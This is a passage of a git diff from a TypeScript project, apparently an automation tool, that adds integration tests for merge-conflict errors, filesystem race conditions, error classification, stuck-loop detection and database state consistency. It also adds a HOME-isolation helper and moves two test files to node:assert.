+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 5: MergeConflictError
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("MergeConflictError handling", () => {
+  test("MergeConflictError has correct properties", () => {
+    const err = new MergeConflictError(
+      ["src/feature.ts", "src/utils.ts"],
+      "squash",
+      "gsd/auto/M001",
+      "main",
+    );
+
+    assert.ok(err instanceof Error, "should be an Error");
+    assert.ok(err instanceof MergeConflictError, "should be a MergeConflictError");
+    assert.deepEqual(err.conflictedFiles, ["src/feature.ts", "src/utils.ts"]);
+    assert.equal(err.strategy, "squash");
+    assert.equal(err.branch, "gsd/auto/M001");
+    assert.equal(err.mainBranch, "main");
+  });
+
+  test("MergeConflictError with merge strategy", () => {
+    const err = new MergeConflictError(
+      ["package.json"],
+      "merge",
+      "feat/new-feature",
+      "main",
+    );
+    assert.equal(err.strategy, "merge");
+  });
+
+  test("MergeConflictError with empty conflict list", () => {
+    const err = new MergeConflictError([], "squash", "branch", "main");
+    assert.deepEqual(err.conflictedFiles, []);
+  });
+
+  test("MergeConflictError is distinguishable from generic errors", () => {
+    const mergeErr = new MergeConflictError(["file.ts"], "squash", "b", "m");
+    const genericErr = new Error("merge failed");
+
+    assert.ok(mergeErr instanceof MergeConflictError);
+    assert.ok(!(genericErr instanceof MergeConflictError));
+
+    // This is the exact pattern used in phases.ts catch blocks
+    if (mergeErr instanceof MergeConflictError) {
+      assert.ok(true, "instanceof check works for catch blocks");
+    }
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 6: Filesystem Race Conditions
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("filesystem race conditions", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("ROADMAP deleted during derive cycle → graceful degradation", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Feature", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    invalidateAllCaches();
+    const state1 = await deriveStateFromDb(base);
+    assert.equal(state1.phase, "executing");
+
+    // Delete ROADMAP mid-flow
+    const roadmapPath = join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md");
+    unlinkSync(roadmapPath);
+
+    invalidateAllCaches();
+    // DB still has the slice/task data, so derivation should still work
+    const state2 = await deriveStateFromDb(base);
+    assert.ok(state2.phase, "should produce a valid phase even after ROADMAP deletion");
+  });
+
+  test("CONTEXT deleted during derive → falls back gracefully", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+
+    const contextPath = join(base, ".gsd", "milestones", "M001", "M001-CONTEXT.md");
+    unlinkSync(contextPath);
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    // Without CONTEXT, title fallback should still work
+    assert.ok(state.activeMilestone, "should still have an active milestone from DB");
+  });
+
+  test("entire slice directory deleted → derive produces valid state", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Feature", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    // Delete entire S01 directory
+    rmSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true, force: true });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    // DB still has slice/task rows, disk is gone — state should degrade gracefully
+    assert.ok(state.phase, "should produce valid phase after slice dir deletion");
+  });
+
+  test("task PLAN file deleted between dispatch and execution → recovery dispatch", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Feature", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    // Delete T01-PLAN.md
+    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-PLAN.md");
+    unlinkSync(planPath);
+
+    // Also write milestone RESEARCH so research-slice rule doesn't fire first
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-RESEARCH.md"),
+      "# Research\nDone.\n",
+    );
+    // Write slice RESEARCH so research-slice rule for non-S01 doesn't fire
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-RESEARCH.md"),
+      "# S01 Research\nDone.\n",
+    );
+
+    const { resolveDispatch } = await import("../../auto-dispatch.ts");
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+
+    const ctx = {
+      basePath: base,
+      mid: "M001",
+      midTitle: "Active",
+      state,
+      prefs: undefined,
+    };
+
+    const result = await resolveDispatch(ctx);
+    // The "executing → execute-task (recover missing task plan)" rule should
+    // detect missing T01-PLAN.md and dispatch plan-slice instead of execute-task
+    if (result.action === "dispatch") {
+      assert.equal(
+        (result as any).unitType,
+        "plan-slice",
+        "missing task plan should trigger plan-slice recovery",
+      );
+    }
+    // It's also valid if the state changed due to cache invalidation
+    assert.ok(result.action, "should produce a valid dispatch action");
+  });
+
+  test("worktree directory disappearance: isGhostMilestone still works", () => {
+    const tmpBase = makeTempDir();
+    const mDir = join(tmpBase, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+
+    // Create worktree dir then delete it (simulates external deletion)
+    const wtDir = join(tmpBase, ".gsd", "worktrees", "M001");
+    mkdirSync(wtDir, { recursive: true });
+
+    // With worktree → not a ghost
+    assert.equal(isGhostMilestone(tmpBase, "M001"), false, "with worktree: not ghost");
+
+    // Delete worktree (simulates external process removing it)
+    rmSync(wtDir, { recursive: true, force: true });
+    assert.ok(!existsSync(wtDir), "worktree should be gone");
+
+    // Without worktree AND without DB → ghost (existsSync handles missing dir)
+    assert.equal(isGhostMilestone(tmpBase, "M001"), true, "without worktree: ghost");
+
+    rmSync(tmpBase, { recursive: true, force: true });
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 7: Graduated Error Recovery in Auto-Loop
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("graduated error recovery logic", () => {
+  test("infrastructure error codes are exhaustive and non-overlapping", () => {
+    // Verify the set contains only OS-level error codes
+    for (const code of INFRA_ERROR_CODES) {
+      assert.ok(code.startsWith("E"), `infra code ${code} should start with E`);
+      assert.ok(code.length >= 4, `infra code ${code} should be at least 4 chars`);
+    }
+  });
+
+  test("SQLite corruption detection via message scan (no code property)", () => {
+    // Simulates sql.js or better-sqlite3 error without proper Node code
+    const err = new Error("SqliteError: database disk image is malformed");
+    const result = isInfrastructureError(err);
+    assert.equal(result, "SQLITE_CORRUPT");
+  });
+
+  test("provider rate limit is NOT an infrastructure error (retryable)", () => {
+    const err = new Error("rate_limit_exceeded: Too many requests");
+    assert.equal(isInfrastructureError(err), null);
+  });
+
+  test("overloaded_error is NOT an infrastructure error (retryable)", () => {
+    const err = new Error("overloaded_error: The model is currently overloaded");
+    assert.equal(isInfrastructureError(err), null);
+  });
+
+  test("authentication error is NOT an infrastructure error", () => {
+    const err = new Error("authentication_error: Invalid API key");
+    assert.equal(isInfrastructureError(err), null);
+  });
+
+  test("permission denied (EACCES) is NOT in infrastructure set", () => {
+    // EACCES is intentionally not in the set — it may indicate a fixable
+    // permissions issue rather than a hardware-level failure
+    const err = Object.assign(new Error("permission denied"), { code: "EACCES" });
+    assert.equal(isInfrastructureError(err), null);
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 8: Multi-Iteration Stuck Scenarios
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("multi-iteration stuck scenarios", () => {
+  test("progressive window: normal → stuck after 3rd same unit", () => {
+    const window: WindowEntry[] = [];
+
+    window.push({ key: "A" });
+    assert.equal(detectStuck(window), null, "1 entry: not stuck");
+
+    window.push({ key: "A" });
+    assert.equal(detectStuck(window), null, "2 entries: not stuck yet");
+
+    window.push({ key: "A" });
+    assert.ok(detectStuck(window)?.stuck, "3 entries: stuck");
+  });
+
+  test("progressive window: oscillation builds up", () => {
+    const window: WindowEntry[] = [];
+
+    window.push({ key: "A" });
+    assert.equal(detectStuck(window), null);
+
+    window.push({ key: "B" });
+    assert.equal(detectStuck(window), null);
+
+    window.push({ key: "A" });
+    assert.equal(detectStuck(window), null, "3 entries A→B→A: not stuck yet");
+
+    window.push({ key: "B" });
+    assert.ok(detectStuck(window)?.stuck, "4 entries A→B→A→B: stuck");
+  });
+
+  test("mixed progress then stuck: A→B→C→C→C → stuck on C", () => {
+    const window: WindowEntry[] = [
+      { key: "A" },
+      { key: "B" },
+      { key: "C" },
+      { key: "C" },
+      { key: "C" },
+    ];
+    const result = detectStuck(window);
+    assert.ok(result?.stuck, "3 consecutive C: stuck");
+    assert.ok(result?.reason.includes("C"), "reason should mention stuck unit");
+  });
+
+  test("error in middle of window does not false-positive", () => {
+    const window: WindowEntry[] = [
+      { key: "A" },
+      { key: "B", error: "transient failure" },
+      { key: "C" },
+      { key: "D" },
+    ];
+    assert.equal(detectStuck(window), null, "single error should not trigger stuck");
+  });
+
+  test("consecutive errors on different keys still triggers Rule 1", () => {
+    const window: WindowEntry[] = [
+      { key: "A", error: "Provider returned 503 Service Unavailable" },
+      { key: "B", error: "Provider returned 503 Service Unavailable" },
+    ];
+    const result = detectStuck(window);
+    assert.ok(result?.stuck, "same error on different keys: stuck by Rule 1");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 9: State Consistency Under Concurrent DB Operations
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("state consistency under DB mutations", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("rapid DB mutations produce consistent deriveStateFromDb results", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Feature", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    // Rapid mutations with invalidation between each
+    invalidateAllCaches();
+    const states: string[] = [];
+
+    const s1 = await deriveStateFromDb(base);
+    states.push(s1.phase);
+
+    // pending → complete
+    const { updateTaskStatus } = await import("../../gsd-db.ts");
+    updateTaskStatus("M001", "S01", "T01", "complete", new Date().toISOString());
+    invalidateAllCaches();
+    const s2 = await deriveStateFromDb(base);
+    states.push(s2.phase);
+
+    // S01 should now be summarizing (all tasks done)
+    assert.equal(states[0], "executing", "initially executing");
+    assert.equal(states[1], "summarizing", "after task complete → summarizing");
+
+    // No state should be undefined or null
+    for (const phase of states) {
+      assert.ok(phase, "every state should have a valid phase");
+    }
+  });
+
+  test("DB milestone status change is reflected after cache invalidation", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Feature", status: "complete" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+
+    invalidateAllCaches();
+    const s1 = await deriveStateFromDb(base);
+    assert.equal(s1.phase, "validating-milestone");
+
+    // Mark milestone complete directly
+    const { updateMilestoneStatus } = await import("../../gsd-db.ts");
+    updateMilestoneStatus("M001", "complete", new Date().toISOString());
+    // Write SUMMARY to make it truly complete
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-SUMMARY.md"),
+      "# M001 Summary\nDone.\n",
+    );
+
+    invalidateAllCaches();
+    const s2 = await deriveStateFromDb(base);
+    // With only M001 and it's complete, should be "complete"
+    assert.equal(s2.phase, "complete", "after milestone completion should be complete");
+  });
+
+  test("deriveState is idempotent: same inputs produce same outputs", async () => {
+    base = createMinimalFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Feature", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    // Call deriveState 5 times with cache invalidation between each
+    const results: string[] = [];
+    for (let i = 0; i < 5; i++) {
+      invalidateAllCaches();
+      const state = await deriveStateFromDb(base);
+      results.push(state.phase);
+    }
+
+    // All should be identical
+    const unique = new Set(results);
+    assert.equal(unique.size, 1, `expected all identical, got: ${[...unique].join(", ")}`);
+    assert.equal(results[0], "executing");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/integration/test-isolation.ts b/src/resources/extensions/gsd/tests/integration/test-isolation.ts
new file mode 100644
index 000000000..bc8270222
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/test-isolation.ts
@@ -0,0 +1,53 @@
+/**
+ * Test isolation utilities for integration tests.
+ *
+ * Integration tests often call `mergeMilestoneToMain` and other functions that
+ * load preferences. If the user's global ~/.gsd/preferences.md has
+ * `git.main_branch: master`, tests fail because test repos use `main`.
+ *
+ * These utilities isolate tests from the user's global environment.
+ */
+
+import { mkdtempSync, rmSync, realpathSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+import { _resetServiceCache } from "../../worktree.ts";
+import { _clearGsdRootCache } from "../../paths.ts";
+
+let originalHome: string | undefined;
+let fakeHome: string | null = null;
+
+/**
+ * Isolate the test environment from user's global preferences.
+ * Creates a fake HOME directory so loadEffectiveGSDPreferences() returns
+ * empty global preferences instead of the user's ~/.gsd/preferences.md.
+ *
+ * Call this in a test.before() hook.
+ */
+export function isolateFromGlobalPreferences(): void {
+  originalHome = process.env.HOME;
+  fakeHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-test-home-")));
+  process.env.HOME = fakeHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+}
+
+/**
+ * Restore the original HOME and clean up the fake home directory.
+ *
+ * Call this in a test.after() hook.
+ */
+export function restoreGlobalPreferences(): void {
+  if (originalHome !== undefined) {
+    process.env.HOME = originalHome;
+  } else {
+    delete process.env.HOME;
+  }
+  _clearGsdRootCache();
+  _resetServiceCache();
+  if (fakeHome) {
+    rmSync(fakeHome, { recursive: true, force: true });
+    fakeHome = null;
+  }
+}
diff --git a/src/resources/extensions/gsd/tests/token-savings.test.ts b/src/resources/extensions/gsd/tests/integration/token-savings.test.ts
similarity index 76%
rename from src/resources/extensions/gsd/tests/token-savings.test.ts
rename to src/resources/extensions/gsd/tests/integration/token-savings.test.ts
index 517ac7f9a..708c1a787 100644
--- a/src/resources/extensions/gsd/tests/token-savings.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/token-savings.test.ts
@@ -10,17 +10,17 @@ import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from 'nod
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { openDatabase, closeDatabase } from '../gsd-db.ts';
-import { migrateFromMarkdown } from '../md-importer.ts';
+import { openDatabase, closeDatabase } from '../../gsd-db.ts';
+import { migrateFromMarkdown } from '../../md-importer.ts';
 import {
   queryDecisions,
   queryRequirements,
   formatDecisionsForPrompt,
   formatRequirementsForPrompt,
-} from '../context-store.ts';
-import { createTestContext } from './test-helpers.ts';
+} from '../../context-store.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, assertMatch, assertNoMatch, report } = createTestContext();
 
 // ─── Fixture Generators ────────────────────────────────────────────────────
 
@@ -154,8 +154,8 @@ console.log('\n=== token-savings: plan-slice prompt ≥30% character savings ===
   openDatabase(':memory:');
   const result = migrateFromMarkdown(base);
 
-  assertTrue(result.decisions === DECISIONS_COUNT, `imported ${result.decisions} decisions, expected ${DECISIONS_COUNT}`);
-  assertTrue(result.requirements === REQUIREMENTS_COUNT, `imported ${result.requirements} requirements, expected ${REQUIREMENTS_COUNT}`);
+  assert.ok(result.decisions === DECISIONS_COUNT, `imported ${result.decisions} decisions, expected ${DECISIONS_COUNT}`);
+  assert.ok(result.requirements === REQUIREMENTS_COUNT, `imported ${result.requirements} requirements, expected ${REQUIREMENTS_COUNT}`);
 
   // ── DB-scoped content for plan-slice (M001 decisions + S01 requirements) ──
   const scopedDecisions = queryDecisions({ milestoneId: 'M001' });
@@ -174,31 +174,31 @@ console.log('\n=== token-savings: plan-slice prompt ≥30% character savings ===
   const savingsPercent = ((fullTotal - dbTotal) / fullTotal) * 100;
   console.log(`  Plan-slice savings: ${savingsPercent.toFixed(1)}% (DB: ${dbTotal} chars, full: ${fullTotal} chars)`);
 
-  assertTrue(dbTotal > 0, 'DB-scoped content is non-empty');
-  assertTrue(dbDecisionsContent.length > 0, 'DB-scoped decisions content is non-empty');
-  assertTrue(dbRequirementsContent.length > 0, 'DB-scoped requirements content is non-empty');
-  assertTrue(savingsPercent >= 30, `plan-slice savings ≥30% (actual: ${savingsPercent.toFixed(1)}%)`);
-  assertTrue(dbTotal < fullTotal * 0.70, `DB total (${dbTotal}) < 70% of full total (${fullTotal})`);
+  assert.ok(dbTotal > 0, 'DB-scoped content is non-empty');
+  assert.ok(dbDecisionsContent.length > 0, 'DB-scoped decisions content is non-empty');
+  assert.ok(dbRequirementsContent.length > 0, 'DB-scoped requirements content is non-empty');
+  assert.ok(savingsPercent >= 30, `plan-slice savings ≥30% (actual: ${savingsPercent.toFixed(1)}%)`);
+  assert.ok(dbTotal < fullTotal * 0.70, `DB total (${dbTotal}) < 70% of full total (${fullTotal})`);
 
   // ── Verify correct scoping: decisions ──
   // M001 decisions: those with when_context containing 'M001' — indices 1,4,7,10,13,16,19,22
   // (24 decisions round-robin across M001/M002/M003 → 8 for M001)
-  assertTrue(scopedDecisions.length === 8, `M001 decisions: expected 8, got ${scopedDecisions.length}`);
+  assert.ok(scopedDecisions.length === 8, `M001 decisions: expected 8, got ${scopedDecisions.length}`);
   for (const d of scopedDecisions) {
-    assertTrue(d.when_context.includes('M001'), `decision ${d.id} should have M001 in when_context, got "${d.when_context}"`);
+    assert.ok(d.when_context.includes('M001'), `decision ${d.id} should have M001 in when_context, got "${d.when_context}"`);
   }
 
   // Verify NO decisions from other milestones leak in
   for (const d of scopedDecisions) {
-    assertNoMatch(d.when_context, /M002|M003/, `decision ${d.id} should not contain M002 or M003`);
+    assert.doesNotMatch(d.when_context, /M002|M003/, `decision ${d.id} should not contain M002 or M003`);
   }
 
   // ── Verify correct scoping: requirements ──
   // S01 requirements: those assigned to S01 as primary_owner
   // S01 appears in positions 1,6,11,16,21 (5 assignments cycling, 21 reqs → indices 0,5,10,15,20)
-  assertTrue(scopedRequirements.length > 0, 'S01 requirements non-empty');
+  assert.ok(scopedRequirements.length > 0, 'S01 requirements non-empty');
   for (const r of scopedRequirements) {
-    assertTrue(
+    assert.ok(
       r.primary_owner.includes('S01') || r.supporting_slices.includes('S01'),
       `requirement ${r.id} should be owned by or support S01`,
     );
@@ -206,13 +206,13 @@ console.log('\n=== token-savings: plan-slice prompt ≥30% character savings ===
 
   // Verify specific expected IDs are present
   const scopedDecisionIds = scopedDecisions.map(d => d.id);
-  assertTrue(scopedDecisionIds.includes('D001'), 'M001 scoped decisions includes D001');
-  assertTrue(scopedDecisionIds.includes('D004'), 'M001 scoped decisions includes D004');
-  assertTrue(!scopedDecisionIds.includes('D002'), 'M001 scoped decisions excludes D002 (M002)');
-  assertTrue(!scopedDecisionIds.includes('D003'), 'M001 scoped decisions excludes D003 (M003)');
+  assert.ok(scopedDecisionIds.includes('D001'), 'M001 scoped decisions includes D001');
+  assert.ok(scopedDecisionIds.includes('D004'), 'M001 scoped decisions includes D004');
+  assert.ok(!scopedDecisionIds.includes('D002'), 'M001 scoped decisions excludes D002 (M002)');
+  assert.ok(!scopedDecisionIds.includes('D003'), 'M001 scoped decisions excludes D003 (M003)');
 
   const scopedReqIds = scopedRequirements.map(r => r.id);
-  assertTrue(scopedReqIds.includes('R001'), 'S01 scoped requirements includes R001');
+  assert.ok(scopedReqIds.includes('R001'), 'S01 scoped requirements includes R001');
 
   closeDatabase();
   rmSync(base, { recursive: true, force: true });
@@ -246,9 +246,9 @@ console.log('\n=== token-savings: research-milestone prompt shows meaningful sav
   const decisionsSavings = ((fullDecisionsContent.length - dbDecisionsContent.length) / fullDecisionsContent.length) * 100;
   console.log(`  Decisions savings (M001): ${decisionsSavings.toFixed(1)}% (DB: ${dbDecisionsContent.length}, full: ${fullDecisionsContent.length})`);
 
-  assertTrue(decisionsSavings > 0, `decisions savings > 0% (actual: ${decisionsSavings.toFixed(1)}%)`);
-  assertTrue(scopedDecisions.length === 8, `M001 decisions: 8 of 24 total`);
-  assertTrue(allRequirements.length === REQUIREMENTS_COUNT, `all requirements returned: ${allRequirements.length}`);
+  assert.ok(decisionsSavings > 0, `decisions savings > 0% (actual: ${decisionsSavings.toFixed(1)}%)`);
+  assert.ok(scopedDecisions.length === 8, `M001 decisions: 8 of 24 total`);
+  assert.ok(allRequirements.length === REQUIREMENTS_COUNT, `all requirements returned: ${allRequirements.length}`);
 
   // Requirements: DB-formatted vs raw markdown — formatted output may differ in size
   // but decisions savings alone should make the composite meaningful
@@ -259,8 +259,8 @@ console.log('\n=== token-savings: research-milestone prompt shows meaningful sav
 
   // With 8/24 decisions = 66% reduction in decisions, even if requirements are equal,
   // the composite should show meaningful savings
-  assertTrue(compositeSavings > 10, `research-milestone shows >10% composite savings (actual: ${compositeSavings.toFixed(1)}%)`);
-  assertTrue(decisionsSavings >= 30, `decisions-only savings ≥30% for M001 scope (actual: ${decisionsSavings.toFixed(1)}%)`);
+  assert.ok(compositeSavings > 10, `research-milestone shows >10% composite savings (actual: ${compositeSavings.toFixed(1)}%)`);
+  assert.ok(decisionsSavings >= 30, `decisions-only savings ≥30% for M001 scope (actual: ${decisionsSavings.toFixed(1)}%)`);
 
   closeDatabase();
   rmSync(base, { recursive: true, force: true });
@@ -283,17 +283,17 @@ console.log('\n=== token-savings: quality — correct scoping, no cross-contamin
 
   // ── M002-scoped decisions should not contain M001/M003 items ──
   const m002Decisions = queryDecisions({ milestoneId: 'M002' });
-  assertTrue(m002Decisions.length === 8, `M002 decisions: expected 8, got ${m002Decisions.length}`);
+  assert.ok(m002Decisions.length === 8, `M002 decisions: expected 8, got ${m002Decisions.length}`);
   for (const d of m002Decisions) {
-    assertTrue(d.when_context.includes('M002'), `M002 decision ${d.id} has M002 in when_context`);
-    assertNoMatch(d.when_context, /M001|M003/, `M002 decision ${d.id} should not contain M001/M003`);
+    assert.ok(d.when_context.includes('M002'), `M002 decision ${d.id} has M002 in when_context`);
+    assert.doesNotMatch(d.when_context, /M001|M003/, `M002 decision ${d.id} should not contain M001/M003`);
   }
 
   // ── S04-scoped requirements should only include S04-related items ──
   const s04Requirements = queryRequirements({ sliceId: 'S04' });
-  assertTrue(s04Requirements.length > 0, 'S04 requirements non-empty');
+  assert.ok(s04Requirements.length > 0, 'S04 requirements non-empty');
   for (const r of s04Requirements) {
-    assertTrue(
+    assert.ok(
       r.primary_owner.includes('S04') || r.supporting_slices.includes('S04'),
       `S04 requirement ${r.id} should be owned by or support S04`,
     );
@@ -301,13 +301,13 @@ console.log('\n=== token-savings: quality — correct scoping, no cross-contamin
 
   // ── Verify formatted output is well-formed and non-empty ──
   const formattedDecisions = formatDecisionsForPrompt(m002Decisions);
-  assertTrue(formattedDecisions.length > 0, 'formatted M002 decisions is non-empty');
-  assertMatch(formattedDecisions, /\| D/, 'formatted decisions contains decision rows');
-  assertMatch(formattedDecisions, /\| # \|/, 'formatted decisions has table header');
+  assert.ok(formattedDecisions.length > 0, 'formatted M002 decisions is non-empty');
+  assert.match(formattedDecisions, /\| D/, 'formatted decisions contains decision rows');
+  assert.match(formattedDecisions, /\| # \|/, 'formatted decisions has table header');
 
   const formattedReqs = formatRequirementsForPrompt(s04Requirements);
-  assertTrue(formattedReqs.length > 0, 'formatted S04 requirements is non-empty');
-  assertMatch(formattedReqs, /### R\d+/, 'formatted requirements has requirement headings');
+  assert.ok(formattedReqs.length > 0, 'formatted S04 requirements is non-empty');
+  assert.match(formattedReqs, /### R\d+/, 'formatted requirements has requirement headings');
 
   // ── Verify all milestones have decisions and counts add up ──
   const m001Count = queryDecisions({ milestoneId: 'M001' }).length;
@@ -315,11 +315,11 @@ console.log('\n=== token-savings: quality — correct scoping, no cross-contamin
   const m003Count = queryDecisions({ milestoneId: 'M003' }).length;
   const allCount = queryDecisions().length;
 
-  assertTrue(m001Count === 8, `M001: 8 decisions (got ${m001Count})`);
-  assertTrue(m002Count === 8, `M002: 8 decisions (got ${m002Count})`);
-  assertTrue(m003Count === 8, `M003: 8 decisions (got ${m003Count})`);
-  assertTrue(allCount === DECISIONS_COUNT, `all: ${DECISIONS_COUNT} decisions (got ${allCount})`);
-  assertTrue(m001Count + m002Count + m003Count === allCount, 'milestone decision counts sum to total');
+  assert.ok(m001Count === 8, `M001: 8 decisions (got ${m001Count})`);
+  assert.ok(m002Count === 8, `M002: 8 decisions (got ${m002Count})`);
+  assert.ok(m003Count === 8, `M003: 8 decisions (got ${m003Count})`);
+  assert.ok(allCount === DECISIONS_COUNT, `all: ${DECISIONS_COUNT} decisions (got ${allCount})`);
+  assert.ok(m001Count + m002Count + m003Count === allCount, 'milestone decision counts sum to total');
 
   // ── Verify all slices have requirements ──
   const s01Reqs = queryRequirements({ sliceId: 'S01' });
@@ -328,11 +328,11 @@ console.log('\n=== token-savings: quality — correct scoping, no cross-contamin
   const s04Reqs = queryRequirements({ sliceId: 'S04' });
   const s05Reqs = queryRequirements({ sliceId: 'S05' });
 
-  assertTrue(s01Reqs.length > 0, 'S01 has requirements');
-  assertTrue(s02Reqs.length > 0, 'S02 has requirements');
-  assertTrue(s03Reqs.length > 0, 'S03 has requirements');
-  assertTrue(s04Reqs.length > 0, 'S04 has requirements');
-  assertTrue(s05Reqs.length > 0, 'S05 has requirements');
+  assert.ok(s01Reqs.length > 0, 'S01 has requirements');
+  assert.ok(s02Reqs.length > 0, 'S02 has requirements');
+  assert.ok(s03Reqs.length > 0, 'S03 has requirements');
+  assert.ok(s04Reqs.length > 0, 'S04 has requirements');
+  assert.ok(s05Reqs.length > 0, 'S05 has requirements');
 
   closeDatabase();
   rmSync(base, { recursive: true, force: true });
@@ -345,22 +345,20 @@ console.log('\n=== token-savings: quality — correct scoping, no cross-contamin
 console.log('\n=== token-savings: fixture data realism ===');
 {
   // Verify fixture generators produce sufficient volume
-  assertTrue(DECISIONS_COUNT >= 20, `decisions count ≥ 20 (actual: ${DECISIONS_COUNT})`);
-  assertTrue(REQUIREMENTS_COUNT >= 20, `requirements count ≥ 20 (actual: ${REQUIREMENTS_COUNT})`);
-  assertTrue(MILESTONES.length >= 3, `milestones ≥ 3 (actual: ${MILESTONES.length})`);
-  assertTrue(SLICE_ASSIGNMENTS.length >= 5, `slice assignments ≥ 5 (actual: ${SLICE_ASSIGNMENTS.length})`);
+  assert.ok(DECISIONS_COUNT >= 20, `decisions count ≥ 20 (actual: ${DECISIONS_COUNT})`);
+  assert.ok(REQUIREMENTS_COUNT >= 20, `requirements count ≥ 20 (actual: ${REQUIREMENTS_COUNT})`);
+  assert.ok(MILESTONES.length >= 3, `milestones ≥ 3 (actual: ${MILESTONES.length})`);
+  assert.ok(SLICE_ASSIGNMENTS.length >= 5, `slice assignments ≥ 5 (actual: ${SLICE_ASSIGNMENTS.length})`);
 
   // Verify markdown content is substantial
-  assertTrue(decisionsMarkdown.length > 1000, `decisions markdown > 1000 chars (actual: ${decisionsMarkdown.length})`);
-  assertTrue(requirementsMarkdown.length > 1000, `requirements markdown > 1000 chars (actual: ${requirementsMarkdown.length})`);
+  assert.ok(decisionsMarkdown.length > 1000, `decisions markdown > 1000 chars (actual: ${decisionsMarkdown.length})`);
+  assert.ok(requirementsMarkdown.length > 1000, `requirements markdown > 1000 chars (actual: ${requirementsMarkdown.length})`);
 
   // Verify content structure
-  assertMatch(decisionsMarkdown, /\| D001 \|/, 'decisions markdown has D001');
-  assertMatch(decisionsMarkdown, /\| D024 \|/, 'decisions markdown has D024');
-  assertMatch(requirementsMarkdown, /### R001/, 'requirements markdown has R001');
-  assertMatch(requirementsMarkdown, /### R021/, 'requirements markdown has R021');
+  assert.match(decisionsMarkdown, /\| D001 \|/, 'decisions markdown has D001');
+  assert.match(decisionsMarkdown, /\| D024 \|/, 'decisions markdown has D024');
+  assert.match(requirementsMarkdown, /### R001/, 'requirements markdown has R001');
+  assert.match(requirementsMarkdown, /### R021/, 'requirements markdown has R021');
 }
 
 // ─── Report ────────────────────────────────────────────────────────────────
-
-report();
diff --git a/src/resources/extensions/gsd/tests/worktree-e2e.test.ts b/src/resources/extensions/gsd/tests/integration/worktree-e2e.test.ts
similarity index 83%
rename from src/resources/extensions/gsd/tests/worktree-e2e.test.ts
rename to src/resources/extensions/gsd/tests/integration/worktree-e2e.test.ts
index 865813e07..fdca0640b 100644
--- a/src/resources/extensions/gsd/tests/worktree-e2e.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/worktree-e2e.test.ts
@@ -18,13 +18,13 @@ import { execSync } from "node:child_process";
 import {
   createAutoWorktree,
   mergeMilestoneToMain,
-} from "../auto-worktree.ts";
-import { getSliceBranchName } from "../worktree.ts";
-import { abortAndReset } from "../git-self-heal.ts";
-import { runGSDDoctor } from "../doctor.ts";
-import { createTestContext } from "./test-helpers.ts";
+} from "../../auto-worktree.ts";
